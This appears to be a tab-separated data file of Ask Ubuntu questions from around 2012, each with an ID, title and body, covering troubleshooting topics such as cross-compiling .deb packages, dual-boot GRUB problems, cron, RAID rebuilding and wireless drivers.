176569	is it possible to cross-compile .deb files using debhelper ? how ?	i have a package ( dymo cups drivers in this instance ) that i need to compile to a .deb file to include in a private network 's repositories . the source itself is sufficiently architecture independent that it 'll compile on 32-bit and 64-bit . i am using debhelper to build the packages , and have successfully built the package for the native architecture . most of the machines run precise 64-bit , but some run precise 32-bit . the current build machine is 64-bit . what i want to be able to do is `` cross-compile '' the package and generate the 32-bit packages from the 64-bit packages . what i 've tried : adding `` -a '' or `` -- architecture '' flags to fakeroot debian/rules binary - fails because it does n't understand the argument ( i must have copied it from a dpkg or other command ) add override_dh_auto_configure in debian/rules that supplies -m32 for cflags etc - builds as 32-bit , but packages and defines dependencies as a 64-bit package installing dpkg-cross and running fakeroot debian/rules binary-cross ( based on an idea from these cross-compile instructions ) - fails because binary-cross does n't exist as a standard dh command things i ca n't try : launchpad/ppa/any other external build service - everything needs to be part of our infrastructure is there any way to make debhelper build 32-bit .deb files on a 64-bit machine ? and if so , how ?
176573	how can i use perl 5.12 in 10.10 ?	how can i use perl 5.12 in ubuntu ? there is no distribution package on ubuntu . i have to use feature 'unicode_strings ' ; in my perl code , and this is available from 5.12 . i try to install perl on ubuntu by apt-get install perl , but 5.10 is the latest version . how can i deal with this ? or is there any code in 5.10 can replace the code feature 'unicode_strings ' ; ? thanks .
176577	can not see the grub screen/ubuntu login after installing ubuntu alongside windows 7 on asus u47a laptop	i have an asus u47a laptop with no discrete graphics . uefi is disabled in the bios . i had windows 7 installed by default . so , i installed ubuntu 12.04 by creating a separate 300gb partition . during the installation , it asked me where to install the bootloader . so , i installed the bootloader on /dev/sda option which selects my entire hard disk i guess . i was also asked to create a separate 1mb bios grub partition before proceeding but i choose to ignore it cause i had the uefi boot disabled . now , after installation , the system just loads windows 7 . i can not see the ubuntu grub/login screen . so , i went to the bios and saw that under boot options , it is still set to windows bootloader option . so , what do i do now ? should i change the boot entry in the bios ? if so , then to what ( windows recognizes the new linux partition as 'd ' drive ) ? i do n't want to remove windows but dual boot . any help would be really appreciated . output of sudo fdisk -l : warning : gpt ( guid partition table ) detected on '/dev/sda ' ! the util fdisk does n't support gpt . use gnu parted . disk /dev/sda : 750.2 gb , 750156374016 bytes 255 heads , 63 sectors/track , 91201 cylinders , total 1465149168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x2902cc6d device boot start end blocks id system /dev/sda1 1 1465149167 732574583+ ee gpt partition 1 does not start on physical sector boundary . *
176587	apt-get update constantly gives out error	lately whenever i run sudo apt-get update it gives me the following error after the 'reading database ' step w : duplicate sources.list entry http : //archive.canonical.com/ubuntu/ precise/partner amd64 packages ( /var/lib/apt/lists/archive.canonical.com_ubuntu_dists_precise_partner_binary-amd64_packages ) w : duplicate sources.list entry http : //archive.canonical.com/ubuntu/ precise/partner i386 packages ( /var/lib/apt/lists/archive.canonical.com_ubuntu_dists_precise_partner_binary-i386_packages ) w : you may want to run apt-get update to correct these problems well i have run apt-get update over and over again and nothing changed . i also tried the options sudo apt-get update -- fix-missing and sudo apt-get update -f which are really the same thing i know , but nothing seems to help .
176593	ca n't login after amd catalyst driver installation	i have almost successfully installed the ati catalyst drivers . but now i ca n't login in to my main account . i enter my password and press enter , then it goes black and back to login screen . although when i try to login with guest account , it works perfectly . i dont want to create new user and move my stuff over there . is there any painless way to get out of this situation ?
176595	ca n't update or install files due to malformed file	e : type 'ain ' is not known on line 3 in source list /etc/apt/sources.list.d/micove-console-precise.list e : the list of sources could not be read . go to the repository dialogue to correct the problem . e : _cache- > open ( ) failed , please report . was trying to install different pcsx2 stuff and disabled the micove-console ppa and tried to reinstall it with packages from terminal , did n't work and now i ca n't use software center or synaptic package manager . synaptic package manager tells me to go to repository to fix the problem , but i ca n't fix it because it will not let me in to fix the problem .
176596	unity 12.04 full screen	if i set a shortcut to 'toggle fullscreen mode ' in settings- > keyboard- > shortcuts- > windows- > toggle fullscreen mode , the shortcut works in unity 2d , but not unity 3d . the same shortcut can be modified with compiz extras , and the result is the same . why is this , is it normal , and how to go to fullscreen mode in unity 3d ?
176599	brightness level issues	about two updates ago , everything with brightness was working perfect ! but since then , the function keys for brightness ( fn + up and fn + down ) are not working ... i mean the brightness reduces only till 1 step using the keys and after that its locked . also , when i go to the brightness settings and reduce the brightness , this is what happens : the brightness is reduced . i close the settings . when i start brightness settings again , the brightness is at the set level but the arrow on the scroller/scale is at full ! i click anywhere on the scale , the brightness suddenly increases to full and then starts reducing . also the brightness level is not remembered after restarting from hibernation and/or suspend . what is wrong all of a sudden ? i am using ubuntu 12.04 lts with unity 3d on samsung np-rv 509 and i have samsung slow down manager and samsung tools installed . ( they make the function keys and stuff work on samsung hardware properly . it is similar to the software provided by samsung for windows . )
176600	how to get unity2d to toggle launcher 's backlight ?	how can i change the behaviour of the launcher icons so that they have their background toggled on only if the application is running ? i want backgrounds or borders highlighted if the application is active , like i have it on unity 3d .
176604	how can i control my others pc 's music from my laptop ?	i have a big music collection on my desktop-pc and it 's hooked to a couple speakers . i want to make the music play through those speakers , but control the player from my laptop ... . it 's hard to explain because i 'm not a native speaker , but i 'll try to clarify with an example : i 'm laying in my bed with my laptop . i choose the song i want to listen and it starts playing through my desktop 's speakers , i can add songs to it 's library with my laptop and so on , i hope this is better explained !
176609	why are `` ls '' and `` stat '' returning different ownerships for the same object ?	this is in a continuation of question here i run this command as root user chown someuser : someuser /mnt/my-address and then # ls -l /mnt/my-address response is total 16 drwx -- -- -- 2 root root 16384 aug 16 11:04 lost+found but when i do stat /mnt/my-address and response is file : `/mnt/my-address' size : 4096 blocks : 8 io block : 4096 directory device : ca51h/51793d inode : 2 links : 3 access : ( 0755/drwxr-xr-x ) uid : ( 106/ someuser ) gid : ( 112/ someuser ) access : 2012-08-16 13:59:53.261099055 +0000 modify : 2012-08-16 11:04:45.000000000 +0000 change : 2012-08-16 13:59:44.013099226 +0000 birth : - why i am getting difference user and group with different commands ?
176613	what is cslistener ?	there seems to be a process called `` cslistener '' on my machine that is listening on port 9000 . a scan using nmap resulted in this , where 172.29.137.150 is the address of my pc . nmap scan report for 172.29.137.150 host is up ( 0.000013s latency ) . not shown : 993 closed ports port state service 22/tcp open ssh 80/tcp open http 139/tcp open netbios-ssn 443/tcp open https 445/tcp open microsoft-ds 9000/tcp open cslistener 10000/tcp open snet-sensor-mgmt what 's going on here ? i 'm on ubuntu 12.04 .
176615	simple audio/mp3 player for small files	i have a new voicemail system that attaches mp3s to emails and sends them to me . i 'm using thunderbird for imap email . when i try to open them with rythmbox , i run into trouble because of the playlist . if i have music on pause , it wo n't even open the voicemail clip , it just starts playing the paused music . i 'm looking for a second player that loads fast to play these voicemails . no other features are necessary . i 'm guessing there may be an issue with the temporary file location .
176617	how to switch desktop wall choice without pressing enter ?	in older versions of ubuntu with compiz , i liked using super + arrow key ( up , down , left , right ) to immediately go to a different desktop wall . i set up the same shortcut keys in ubuntu 12.04 with compizconfig settings manager , but now i must press the enter key to commit the desktop wall choice . for example , i want super + right to jump to the right virtual desktop without pressing the enter key to commit the change . this may be related to question : alt-tab in 12.04 requires pressing enter to select app , can i disable that ? but that is a problem with the application switcher , this is about the desktop switcher .
176620	complete disk wipe , reformat and os change	i have an old laptop , that i wish to rejuvenate . i need to completely wipe the hard drive as well as reformat it and install a new operating system . i have decided to move to ubuntu , and no longer use my ms products at all . this does leave me with some questions . if you could assist i would be most grateful . i intend doing a 6 stage `` zero & one '' wipe , this would hopefully leave the hard drive completely clean , but that would then leave me without any drivers or the ability to reformat the drive . so would loading ubuntu from the cd drive work , or would i then have a problem not having drivers for the mouse , harddrive , cd player etc. ? also will i get halfway through the load to find a driver search that leaves the machine useless ? will i be able to format the hard drive after the ubuntu load ? is the bios kept on the hdd or is it installed on the motherboard , if i wipe my hdd will i still be able to access the bios to instruct the boot from the cd ? my machine specs are as in the link . would it be better to load ubuntu `` desktop '' or ubuntu `` notebook '' on this type of spec ? are there any other surprises i need to be wary of , before i go ahead with this ?
176625	no graphical effects in ubuntu 12.04	i have recently installed ubuntu 12.04 via wubi inside windows on my laptop . i get standard graphics at start . but when i install the graphical driver through the additional drivers it installs the main driver , but update installation fails . then i ca n't see 3d effects too . i ca n't find a solution for this . i have intel i5 3210m with intel hd 4000 graphic card with amd radeon hd7670m 1 gb in switchable mode . i need to know how to enable the eye candy on my laptop . i just miss ubuntu without it . please help ! !
176634	unity 2d support dropped in 12.10 , what now ?	so its been announced . ubuntu is dropping unity 2d support . i would n't mind if it was n't for two things that are important to me . 1 ) a working system unity is nice , i try to use it quite often . but it lags . 2 ) support for older hardware . i also have old computers . you can imagine how they would work with unity if my current laptop is slog in ubuntu . i guess i could use another desktop environment/ window manager , like switching to fluxbox . anyone have any suggestion ideas/solutions on how to proceed with ubuntu in the future ? all insights welcome
176640	fs is read only , `` mount -n -o remount / '' not working since the fs is not writeable	how can i remount my filesystem rw if the filesystem is read only ?
176643	frozen starting in ubuntu 12.04	i updated ubuntu 12.04 from 11.10 and in the begining i did not have any problem , but after some upgrades when i booted ubuntu 12.04 from the grub it frozen in the starting screen ( the ubuntu word with the dots ) . i reinstalled 12.04 many times from the livecd and after some upgrades it happens the same including the message ( before the starting screen ) that the intel graphycs acceleration failed
176646	what advantages do raid installations provide ?	`` redundant array of independent disks `` raid '' is a method of using multiple disks to provide different balances of increasing data reliability and/or increasing input/output performance , depending on the raid level being used . '' the main problem is i ca n't imagine what this would look like . could someone explain with a practical example ?
176651	updates/applications to all virtualbox 's os 's	consider i have 3 virtualbox installed ubuntu os 's . what i want to do now is to transfer the updates and new application installs to the 2 other virtual-box installed os 's . so that i can save time for updating them . thank you .
176656	how to download ubuntu one folders to my computer ?	i am running 11.10 on a dell d600 laptop and i uploaded files to my ubuntu one account from my desktop . i would like to download them to the laptop . i can access my cloud from the laptop but i do n't know how to download the files .
176659	only hdmi audio since installing nvidia card : onboard audio device has disappeared	i replaced my graphics card with an nvidia gt620 . however , when i rebooted with the new card , my onboard intel audio device disappeared completely - does not even appear in lshw . now the only audio output is the hdmi audio on the nvidia card , which is annoying as my monitor has speakers but no headphone jack . how can i make the hdmi audio device go away , and get back my onboard audio ? sound-related stanza in lshw : *-multimedia description : audio device product : gf108 high definition audio controller vendor : nvidia corporation physical id : 0.1 bus info : pci @ 0000:02:00.1 version : a1 width : 32 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : driver=snd_hda_intel latency=0 resources : irq:60 memory : fccfc000-fccfffff output of `` aplay -l '' : **** list of playback hardware devices **** card 0 : nvidia [ hda nvidia ] , device 3 : hdmi 0 [ hdmi 0 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 0 : nvidia [ hda nvidia ] , device 7 : hdmi 0 [ hdmi 0 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 0 : nvidia [ hda nvidia ] , device 8 : hdmi 0 [ hdmi 0 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 0 : nvidia [ hda nvidia ] , device 9 : hdmi 0 [ hdmi 0 ] subdevices : 0/1 subdevice # 0 : subdevice # 0 output of sudo lspci | grep aud 02:00.1 audio device : nvidia corporation gf108 high definition audio controller ( rev a1 )
176671	reversing role of pressing shift+number	is there any way to reverse the role of the keyboard action shift+ [ 1..9 ] ? basically i find myself using the symbols on the numbers much more often than the numbers themselves . i have the numpad for the numbers . and a lot of these symbols are used in coding and latex . so if anybody knows how i can get ! @ # $ % ^ & * ( ) without the use of shift i would be greatly thankful .
176672	installation help !	i have a hp pavilion p6120t desktop , and i recently wiped its hard drive using my macbook 's disk utility . i tried to install ubuntu on it , but i ca n't because i apparently do n't have 4.4 gigabytes of space available . i tried using gparted , but i got `` no devices found . '' help ?
176674	ca n't run a wifi hotspot via my laptop	i tried to create a wifi hotspot from my laptop ( connected to a wired broadband connection ) . i followed instructions from various tutorials , but i think that the os can not recognize my wifi lan adaptor . all is well it says that it 's connected and running but when i scan with my android phone ica n't find my hostpot.also , my laptop dose not see any wifi networks , event tough my phone can see several in the area .
176676	difference between the results of the top command and system-monitor , why ?	why is there a huge difference between the outputs ' of top command and the system monitor when both programs were run at the same time . please find attached is the screen shot showing the huge difference : - is this a bug ?
176677	cron service up but apparently not working	i 'm trying cron in a ubuntu vps with a minimal install , so i had to run apt-get install cron . however , say i run crontab -e and add ( as root ) the following line : * * * * * date > > /root/datelog i get the success notification : crontab : installing new crontab but /root/datelog is never created . if i try start cron i get : start : job is already running : cron on the other hand , ps does n't yield anything : # ps -ef|grep cron root 3087 10498 0 mar17 pts/24 00:00:00 grep -- color=auto cron root 29081 7863 0 mar13 pts/8 00:00:00 man crontab any thoughts ? thanks ! edit : following imaginaryrobots ' suggestion , i have modified my crontab as follows ... to no avail . * * * * * date > > /root/datelog * * * * * date > > /tmp/datelog * * * * * /bin/date > > /root/bindatelog * * * * * /bin/date > > /tmp/bindatelog i.e. , no such files appear either in /root or in /tmp . edit 2 : maybe i should mention that ubuntu 12.04 ( or at least this vps ) is giving me what i consider to be a well-known bug upon apt-get upgrade : mount : permission denied dpkg : error processing initscripts ( -- configure ) : subprocess installed post-installation script returned error exit status 1 errors were encountered while processing : initscripts e : sub-process /usr/bin/dpkg returned an error code ( 1 ) packages install apparently with no problems . but this may be affecting the behavior of the system after all ...
176679	how to find the executable file of an app if 'whereis ' is not showing it ?	this basically to do with cuttlefish ( the app from showdown ) in this case . i cant find the location of the executable file for it . the command whereis did not give any results ! i want to add it to my start up applications and thus i need the path ! p.s : the preferences of the app are not showing up and ticking against the start automatically thing when the settings for the 1st time showed up is not working ! . so i need to find out the executable/bin file ... how do i do this ?
176682	help rebuilding raid1 array ?	i 'm running 10.04 lts desktop 64bit , with two identical disks set up as a raid 1 array . last week i kicked the power lead from the back of the pc using the rescue disk to repair grub , i can now boot from sda2 mounted at / , while sdb2 seems ok but not mounted . the swap partitions , sda1 & sdb1 , still appear to be part of raid mdb1 . can someone kindly please advise me how to reassemble the boot/data part of the raid , using sda2 as the master disk and overwriting sdb2 ? everything on sda2 has been backed up . mdadm & mdstat output follows . mick mick @ mick-desktop : ~/desktop $ sudo mdadm -e /dev/sd [ ab ] 2 mdadm : no md superblock detected on /dev/sda2 . mdadm : no md superblock detected on /dev/sdb2 . mick @ mick-desktop : ~/desktop $ sudo mdadm -e /dev/sd [ ab ] 1 /dev/sda1 : magic : a92b4efc version : 00.90.00 uuid : 6e5f04e7 : a2c2824e:4190d0c1:868b9bfb creation time : thu jun 17 11:59:49 2010 raid level : raid1 used dev size : 7812032 ( 7.45 gib 8.00 gb ) array size : 7812032 ( 7.45 gib 8.00 gb ) raid devices : 2 total devices : 2 preferred minor : 1 update time : thu aug 2 11:58:37 2012 state : clean active devices : 2 working devices : 2 failed devices : 0 spare devices : 0 checksum : 1f150e2e - correct events : 7340 number major minor raiddevice state this 0 8 1 0 active sync /dev/sda1 0 0 8 1 0 active sync /dev/sda1 1 1 8 17 1 active sync /dev/sdb1 /dev/sdb1 : magic : a92b4efc version : 00.90.00 uuid : 6e5f04e7 : a2c2824e:4190d0c1:868b9bfb creation time : thu jun 17 11:59:49 2010 raid level : raid1 used dev size : 7812032 ( 7.45 gib 8.00 gb ) array size : 7812032 ( 7.45 gib 8.00 gb ) raid devices : 2 total devices : 2 preferred minor : 1 update time : thu aug 2 11:58:37 2012 state : clean active devices : 2 working devices : 2 failed devices : 0 spare devices : 0 checksum : 1f150e40 - correct events : 7340 number major minor raiddevice state this 1 8 17 1 active sync /dev/sdb1 0 0 8 1 0 active sync /dev/sda1 1 1 8 17 1 active sync /dev/sdb1 mick @ mick-desktop : ~/desktop $ cat /proc/mdstat personalities : [ linear ] [ multipath ] [ raid0 ] [ raid1 ] [ raid6 ] [ raid5 ] [ raid4 ] [ raid10 ] md1 : active raid1 sdb1 [ 1 ] sda1 [ 0 ] 7812032 blocks [ 2/2 ] [ uu ] unused devices : mick @ mick-desktop : ~/desktop $
176685	why does `` purge '' not remove everything related to an app ?	i have learnt that using purge command rather than remove is considered better because purge removes all files related to an app including the config files etc . now this has happened before too but as now i dont remember those examples i state my latest encounter- the problem- even after purging , some files remain ! latest encounter- cuttlefish ( the app from the showdown ) i purged cuttlefish as it was nor working properly whatsoever and then restarted ubuntu ( although that is not necessary ) and then re installed it to already find some trigers i had made in the app before deleting it already present ! which meant some file ( config or something ) was not cleared out ! now i tracked down 2 files in a folder ( .cuttlefish ) under home and found some files related to plugins and a reflexes.db file ( which seems to be the one responsible to contain the triggers i got back on re instal ) i deleted them mannually and did the re install.though m still facing other problems with the app , why dint the purge command remove these files ? thankyou !
176692	how do i legally make an open-source version of a closed-source game ?	is it legal to make an open-source version of a closed-source game ( and expansion pack ) to distribute to other users ? i want to do that for an old game called age of empires 2 .
176702	card reader in msi x370 do n't work	card reader in msi x370 do n't work . ubuntu 12.04 64bit gnomeshell 00:00.0 host bridge : advanced micro devices [ amd ] family 14h processor root complex 00:01.0 vga compatible controller : advanced micro devices [ amd ] nee ati wrestler [ radeon hd 6320 ] 00:01.1 audio device : advanced micro devices [ amd ] nee ati wrestler hdmi audio [ radeon hd 6250/6310 ] 00:11.0 sata controller : advanced micro devices [ amd ] nee ati sb7x0/sb8x0/sb9x0 sata controller [ ahci mode ] ( rev 40 ) 00:12.0 usb controller : advanced micro devices [ amd ] nee ati sb7x0/sb8x0/sb9x0 usb ohci0 controller 00:12.2 usb controller : advanced micro devices [ amd ] nee ati sb7x0/sb8x0/sb9x0 usb ehci controller 00:13.0 usb controller : advanced micro devices [ amd ] nee ati sb7x0/sb8x0/sb9x0 usb ohci0 controller 00:13.2 usb controller : advanced micro devices [ amd ] nee ati sb7x0/sb8x0/sb9x0 usb ehci controller 00:14.0 smbus : advanced micro devices [ amd ] nee ati sbx00 smbus controller ( rev 42 ) 00:14.1 ide interface : advanced micro devices [ amd ] nee ati sb7x0/sb8x0/sb9x0 ide controller ( rev 40 ) 00:14.2 audio device : advanced micro devices [ amd ] nee ati sbx00 azalia ( intel hda ) ( rev 40 ) 00:14.3 isa bridge : advanced micro devices [ amd ] nee ati sb7x0/sb8x0/sb9x0 lpc host controller ( rev 40 ) 00:14.4 pci bridge : advanced micro devices [ amd ] nee ati sbx00 pci to pci bridge ( rev 40 ) 00:15.0 pci bridge : advanced micro devices [ amd ] nee ati sb700/sb800/sb900 pci to pci bridge ( pcie port 0 ) 00:15.2 pci bridge : advanced micro devices [ amd ] nee ati sb900 pci to pci bridge ( pcie port 2 ) 00:18.0 host bridge : advanced micro devices [ amd ] family 12h/14h processor function 0 ( rev 43 ) 00:18.1 host bridge : advanced micro devices [ amd ] family 12h/14h processor function 1 00:18.2 host bridge : advanced micro devices [ amd ] family 12h/14h processor function 2 00:18.3 host bridge : advanced micro devices [ amd ] family 12h/14h processor function 3 00:18.4 host bridge : advanced micro devices [ amd ] family 12h/14h processor function 4 00:18.5 host bridge : advanced micro devices [ amd ] family 12h/14h processor function 6 00:18.6 host bridge : advanced micro devices [ amd ] family 12h/14h processor function 5 00:18.7 host bridge : advanced micro devices [ amd ] family 12h/14h processor function 7 02:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168b pci express gigabit ethernet controller ( rev 06 ) lsusb bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 001 device 003 : id 5986:030c acer , inc bus 003 device 002 : id 046d : c52f logitech , inc. wireless mouse m305 bus 001 device 004 : id 0bda:0139 realtek semiconductor corp .
176706	how is it decided/defined as to which file of an app will reside where ?	most of the apps have their executables in /usr/bin and other files also in the generally defines folders.. but i found some apps keep their executeables elsewhere ... now as in linux any file can be executeable the file can actually be placed anywhere.. but for achieving proper segrigation and stuff which locations have been defined as the ones that should be preferably be used for various files of an app ? is there any specification for it as such ?
176712	12.04 wo n't install on my asus g75v	i decided to give ubuntu a try the other day . i downloaded the cd .iso from ubuntu 's site and burned it to a cd . i told my computer to boot up from my dvd drive ( asus g75v ) . popped the disk in . rebooted computer . the screen goes to this purple screen with a keyboard and a circle around a stick figure at the bottom . stays at that screen for a few seconds then the screen goes black . there is a black screen with this cursor blinking . it stays there and just wo n't change . i put the cd into another computer to verify it was n't the cd and that computer loaded up ubuntu fine . i do have a copy of windows 7 installed . i have tried to burn a 32-bit and a 64-bit , tried using two different usb pens . anyone have any tips on what i can do ? i want to dual boot windows and ubuntu .
176719	draftsight for ubuntu 12.04 lts 64bit	is there any edited file for draftsight.deb so it can work on ubuntu 12.04 lts 64bit i have downloaded the draftsight.deb from the website and tried to install it on my laptop but i could n't install it . if anyone knows an edited deb file please give me the link ... i have tried other solutions but it seems that i ca n't follow up with these solutions or they do n't work at all i need it for my work ... thanks anyway
176722	wireless driver only works after plugging the cable in with a bcm4313	i upgraded to ubuntu 12.04 this week . i 've had a couple of problems with my wireless card . after following some posts here on askubuntu i got it to work on a peculiar way : when i start my laptop without the ethernet cable , i get stuck on the ubuntu `` loading '' screen while the system is booting . it says `` waiting for network configuration '' . then it stays like that for about 2 minutes and when it finally boots up , i have no network connection . however , if i boot with my ethernet cable plugged in , it loads quickly and with my wireless working just fine ! i 'm not sure what to do anymore , i want that the wireless card works despite the ethernet cable is in or not . so i 'm asking for your help . here are the results from some commands that may be helpful , if you need more info let me know , please . sudo lshw -c network *-network description : ethernet interface product : rtl8111/8168b pci express gigabit ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:02:00.0 logical name : eth0 version : 03 serial : c8:0a : a9 : df : ff : ad capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list rom ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8168 driverversion=8.032.00-napi duplex=half ip=192.168.0.167 latency=0 link=no multicast=yes port=twisted pair resources : irq:43 ioport:3000 ( size=256 ) memory : d0004000-d0004fff memory : d0000000-d0003fff memory : d0020000-d003ffff *-network description : wireless interface product : bcm4313 802.11b/g/n wireless lan controller vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:06:00.0 logical name : wlan0 version : 01 serial : 00:26:82:93 : d6 : c4 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=brcmsmac driverversion=3.2.0-29-generic-pae firmware=n/a ip=192.168.0.103 latency=0 link=yes multicast=yes wireless=ieee 802.11bgn resources : irq:17 memory : d2100000-d2103fff rfkill list 0 : hci0 : bluetooth soft blocked : no hard blocked : no 1 : hp-wifi : wireless lan soft blocked : no hard blocked : no 2 : hp-bluetooth : bluetooth soft blocked : no hard blocked : no 3 : phy0 : wireless lan soft blocked : no hard blocked : no sudo lspci 00:00.0 host bridge : advanced micro devices [ amd ] rs880 host bridge 00:01.0 pci bridge : hewlett-packard company device 9602 00:04.0 pci bridge : advanced micro devices [ amd ] rs780/rs880 pci to pci bridge ( pcie port 0 ) 00:07.0 pci bridge : advanced micro devices [ amd ] rs780 pci to pci bridge ( pcie port 3 ) 00:09.0 pci bridge : advanced micro devices [ amd ] rs780/rs880 pci to pci bridge ( pcie port 4 ) 00:11.0 sata controller : advanced micro devices [ amd ] nee ati sb7x0/sb8x0/sb9x0 sata controller [ ahci mode ] 00:12.0 usb controller : advanced micro devices [ amd ] nee ati sb7x0/sb8x0/sb9x0 usb ohci0 controller 00:12.2 usb controller : advanced micro devices [ amd ] nee ati sb7x0/sb8x0/sb9x0 usb ehci controller 00:13.0 usb controller : advanced micro devices [ amd ] nee ati sb7x0/sb8x0/sb9x0 usb ohci0 controller 00:13.2 usb controller : advanced micro devices [ amd ] nee ati sb7x0/sb8x0/sb9x0 usb ehci controller 00:14.0 smbus : advanced micro devices [ amd ] nee ati sbx00 smbus controller ( rev 41 ) 00:14.2 audio device : advanced micro devices [ amd ] nee ati sbx00 azalia ( intel hda ) ( rev 40 ) 00:14.3 isa bridge : advanced micro devices [ amd ] nee ati sb7x0/sb8x0/sb9x0 lpc host controller ( rev 40 ) 00:14.4 pci bridge : advanced micro devices [ amd ] nee ati sbx00 pci to pci bridge ( rev 40 ) 00:14.5 usb controller : advanced micro devices [ amd ] nee ati sb7x0/sb8x0/sb9x0 usb ohci2 controller 00:16.0 usb controller : advanced micro devices [ amd ] nee ati sb7x0/sb8x0/sb9x0 usb ohci0 controller 00:16.2 usb controller : advanced micro devices [ amd ] nee ati sb7x0/sb8x0/sb9x0 usb ehci controller 00:18.0 host bridge : advanced micro devices [ amd ] family 10h processor hypertransport configuration 00:18.1 host bridge : advanced micro devices [ amd ] family 10h processor address map 00:18.2 host bridge : advanced micro devices [ amd ] family 10h processor dram controller 00:18.3 host bridge : advanced micro devices [ amd ] family 10h processor miscellaneous control 00:18.4 host bridge : advanced micro devices [ amd ] family 10h processor link control 01:05.0 vga compatible controller : advanced micro devices [ amd ] nee ati rs880m [ mobility radeon hd 4200 series ] 01:05.1 audio device : advanced micro devices [ amd ] nee ati rs880 hdmi audio [ radeon hd 4200 series ] 02:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168b pci express gigabit ethernet controller ( rev 03 ) 06:00.0 network controller : broadcom corporation bcm4313 802.11b/g/n wireless lan controller ( rev 01 ) i ran `` nmcli dev list '' on both cases . here is what i got when i ran it without having the ethernet cable ( i.e . wireless not working ) error : networkmanager is not running . this is what i got when i ran it when wireless was ok : general.device : wlan0 general.type : 802-11-wireless general.vendor : broadcom corporation general.product : bcm4313 802.11b/g/n wireless lan controller general.driver : brcmsmac general.hwaddr : 00:26:82:93 : d6 : c4 general.state : 100 ( connected ) general.reason : 0 ( no reason given ) general.udi : /sys/devices/pci0000:00/0000:00:09.0/0000:06:00.0/net/wlan0 general.ip-iface : wlan0 general.nm-managed : yes general.firmware-missing : no general.connection : /org/freedesktop/networkmanager/activeconnection/0 capabilities.carrier-detect : no capabilities.speed : 72 mb/s wifi-properties.wep : yes wifi-properties.wpa : yes wifi-properties.wpa2 : yes wifi-properties.tkip : yes wifi-properties.ccmp : yes ap1.ssid : 'rep kaxota' ap1.bssid : 00:19:5b : b4 : f6:21 ap1.mode : infrastructure ap1.freq : 2437 mhz ap1.rate : 54 mb/s ap1.signal : 45 ap1.security : wpa wpa2 ap1.active : no ap2.ssid : 'repamnesia' ap2.bssid : c8:3a:35:08:88 : d8 ap2.mode : infrastructure ap2.freq : 2412 mhz ap2.rate : 54 mb/s ap2.signal : 75 ap2.security : wep ap2.active : no ap3.ssid : 'amnesia' ap3.bssid : 1c:7e : e5 : c2 : b6 : b8 ap3.mode : infrastructure ap3.freq : 2437 mhz ap3.rate : 54 mb/s ap3.signal : 79 ap3.security : wep ap3.active : yes ip4.address [ 1 ] : ip = 192.168.xxx.xxx/24 , gw = 192.168.xxx.xxx ip4.dns [ 1 ] : 200.204.xxx.xxx ip4.dns [ 2 ] : 200.204.xxx.xxx ip4.dns [ 3 ] : 192.168.xxx.xxx dhcp4.option [ 1 ] : expiry = 1345748643 dhcp4.option [ 2 ] : broadcast_address = 192.168.xxx.xxx dhcp4.option [ 3 ] : dhcp_message_type = 5 dhcp4.option [ 4 ] : routers = 192.168.xxx.xxx dhcp4.option [ 5 ] : dhcp_lease_time = 604800 dhcp4.option [ 6 ] : ip_address = 192.168.xxx.xxx dhcp4.option [ 7 ] : subnet_mask = 255.255.255.0 dhcp4.option [ 8 ] : dhcp_renewal_time = 604780 dhcp4.option [ 9 ] : domain_name_servers = 200.204.xxx.xxx 200.204.xxx.xxx 192.168.xxx.xxx dhcp4.option [ 10 ] : dhcp_rebinding_time = 604780 dhcp4.option [ 11 ] : network_number = 192.168.0.0 dhcp4.option [ 12 ] : dhcp_server_identifier = 192.168.xxx.xxx general.device : eth0 general.type : 802-3-ethernet general.vendor : realtek semiconductor co. , ltd. general.product : rtl8111/8168b pci express gigabit ethernet controller general.driver : r8168 general.hwaddr : c8:0a : a9 : df : ff : ad general.state : 10 ( unmanaged ) general.reason : 0 ( no reason given ) general.udi : /sys/devices/pci0000:00/0000:00:04.0/0000:02:00.0/net/eth0 general.ip-iface : general.nm-managed : no general.firmware-missing : no general.connection : not connected capabilities.carrier-detect : yes capabilities.speed : 100 mb/s wired-properties.carrier : off adding more information ( this was taken while booting normally , i.e . without cable ) : contents of /etc/network/interfaces auto eth0 iface eth0 inet dhcp ( with the empty last line ) contents of if-down.d ( i don`t know how to check the version . i suppose it 's that v143 on the first line ) : '' ============================================================================ '' netrw directory listing ( netrw v143 ) '' /etc/network/if-down.d '' sorted by name '' sort sequence : [ \/ ] $ , \ < core\ % ( \.\d\+\ ) \=\ > , \.h $ , \.c $ , \.cpp $ , \~\=\* $ , * , \.o $ , \ '' quick help : < f1 > : help - : go up dir d : delete r : rename s : sort-by x : exec '' ============================================================================ ../ avahi-autoipd* resolvconf* upstart* wpasupplicant @ contents of if-up.d : `` ============================================================================ `` netrw directory listing ( netrw v143 ) `` /etc/network/if-up.d `` sorted by name `` sort sequence : [ / ] $ , \ , .h $ , .c $ , .cpp $ , \~\=* $ , ,.o $ , \ `` quick help : : help - : go up dir d : delete r : rename s : sort-by x : exec `` ============================================================================ ../ 000resolvconf avahi-autoipd* avahi-daemon* ntpdate* upstart* wpasupplicant @ contents of /run/network directory : matheus @ matheus-laptop : /run/network $ ls -la total 0 drwxr-xr-x 2 root root 60 sep 5 19:54 . drwxr-xr-x 21 root root 720 sep 5 19:54 .. -rw-r -- r -- 1 root root 0 sep 5 19:54 ifstate contents of ifstate : empty thank you very much in advance ! matheus
